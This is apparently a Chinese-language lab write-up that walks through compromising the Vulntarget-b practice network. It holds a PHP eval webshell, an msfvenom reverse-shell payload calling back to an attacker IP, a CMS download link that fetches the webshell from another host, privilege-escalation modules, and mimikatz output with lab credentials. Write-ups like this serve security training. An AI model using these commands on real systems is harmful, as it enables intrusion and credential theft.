Vulntarget-b

首先对端口进行扫描

1
nmap -p- 192.168.0.104

很多端口,进行挨个尝试

发现80没有站点

但是81站点为极致CMS

4567的端口很明显为宝塔的默认index.html

8888端口为宝塔的进入端口

那么我们就可以从peiqi文库找CMS着手开始

1
https://peiqi.wgpsec.org/wiki/cms/
1
2
3
弱口令
admin/admin123
进入后台

跟着复现,我本地没有出现

所以直接选择在宝塔机器上写🐎

重新把环境返回了快照,所以centos的外网地址变了,不用care

蚁剑连接上进行msf拿shell

这里是被宝塔限制了危险函数,所以通过蚁剑插件进行绕过

然后进行反弹shell

msf生成木马

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=5555 -f elf -o m3f.elf

进来后发现是www权限,于是运用msf的搜索提权模块

1
run post/multi/recon/local_exploit_suggester
1
2
3
4
5
1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
2   exploit/linux/local/network_manager_vpnc_username_priv_esc         Yes                      The service is running, but could not be validated.
3   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
4   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.

通过第一个漏洞提权成功

1
2
3
shell 
python -c "import pty;pty.spawn('/bin/bash')" #获取一个交互式的shell
cat  /root/flag

成功获取第一个flag

查看网卡,发现双网卡,配置路由开启代理

1
2
3
4
5
6
7
8
run post/multi/manage/autoroute
run autoroute -p
bg
search socks_proxy
use 0
set version 4a
run
jobs

发现了66这台主机

然后传个fscan在扫一遍也不是不可以^_^

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
./fscan_386 -h 10.0.20.66   

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 10.0.20.66      is alive
[*] Icmp alive hosts len is: 1
10.0.20.66:8080 open
10.0.20.66:3306 open
10.0.20.66:445 open
10.0.20.66:139 open
10.0.20.66:135 open
[*] alive ports len is: 5
start vulscan
[*] NetBios: 10.0.20.66      VULNTARGET\WIN10               
[*] WebTitle: http://10.0.20.66:8080    code:200 len:141    title:None
[+] InfoScan:http://10.0.20.66:8080    [禅道] 
已完成 5/5
[*] 扫描结束,耗时: 16.627957514s

扫到了8080开启了禅道CMS

浏览器配置代理进去看看

1
admin/Admin123

弱口令进入后台

然后又来到peiqi文库进行找漏洞利用

最终在这个漏洞利用成功

1
https://peiqi.wgpsec.org/wiki/cms/%E7%A6%85%E9%81%93/%E7%A6%85%E9%81%93%2012.4.2%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%20CNVD-C-2020-121325.html

因为66这台机器不出网,但是连接着centos7这台机器,所以我们利用在该机器上下载webshell

首先在centos的/tmp上写入一句话

1
<?php @eval($_POST[cmd])?>

然后开启py的服务进行传输这个文件到66这台机器

1
python -m SimpleHTTPServer 4567

然后通过禅道CMS访问

1
2
3
index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6NDU2Ny9zaC5waHA=

base64 -> HTTP://10.0.20.30:4567/sh.php

开蚁剑proxy进行连上🐎

通过HTTP进行代理转发

1
./proxy http -t tcp -p "0.0.0.0:8080" --daemon

然后弹个shell进行正向连接

发现存在火绒,这里进行利用工具进行免杀

发现是个低权限

1
run post/multi/recon/local_exploit_suggester
1
2
3
4
5
6
7
8
9
10
11
12
13
14
1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
3   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
4   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
5   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
6   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1909 build detected!
7   exploit/windows/local/cve_2020_0796_smbghost                   Yes                      The target appears to be vulnerable.
8   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
9   exploit/windows/local/cve_2020_1313_system_orchestrator        Yes                      The target appears to be vulnerable.
10  exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
11  exploit/windows/local/cve_2020_17136                           Yes                      The target appears to be vulnerable. A vulnerable Windows 10 v1909 build was detected!
12  exploit/windows/local/cve_2021_40449                           Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1909 build detected!
13  exploit/windows/local/cve_2022_21882_win32k                    Yes                      The target appears to be vulnerable.
14  exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
1
exploit/windows/local/cve_2022_21882_win32k

进行成功提权

进行run mimikatz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Authentication Id : 0 ; 14580245 (00000000:00de7a15)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : VULNTARGET
Logon Server      : WIN-UH20PRD3EAO
Logon Time        : 2023/11/21 0:40:36
SID               : S-1-5-21-3374851086-947483859-3378876003-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : VULNTARGET
	 * NTLM     : 570a9a65db8fba761c1008a51d4c95ab
	 * SHA1     : 759e689a07a84246d0b202a80f5fd9e335ca5392
	 * DPAPI    : 498266e09dee384e15ad686ed4de3822
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : VULNTARGET
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : VULNTARGET.COM
	 * Password : Admin@123
	ssp :	
	credman :	
	cloudap :

然后用https://github.com/safebuffer/sam-the-admin

1
2
3
proxychains4 python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

type c:\Users\Administrator\flag.txt